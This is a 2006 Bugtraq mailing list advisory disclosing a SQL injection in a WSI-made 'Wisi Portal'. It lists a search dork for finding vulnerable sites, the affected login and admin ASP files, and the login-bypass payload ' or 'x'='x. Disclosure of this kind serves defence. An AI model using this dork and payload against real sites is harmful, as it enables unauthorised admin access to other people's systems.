Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Wisi Portal [Sql Injection By Jesus Tovar]

From: nagazakig74 () hotmail com
Date: 25 Nov 2006 02:31:55 -0000
######################
##By: Jesus Tovar
##mail: nagazakig74 () hotmail com
##Greetz: Dario Struz
##Vendor: http://www.wsicorporate.com
##Digital Security Owner 
####################################

Dork: "Created and maintained by WSI"

File Bug: /login.asp
          /admin/login.asp
          /admin/request.asp

Sql Injection :
 
' or 'x'='x

Site Examples:

http://host.com/admin/login.asp
                     /default.asp
                     /request.asp
Previous By Date Next
Previous By Thread Next

Current thread: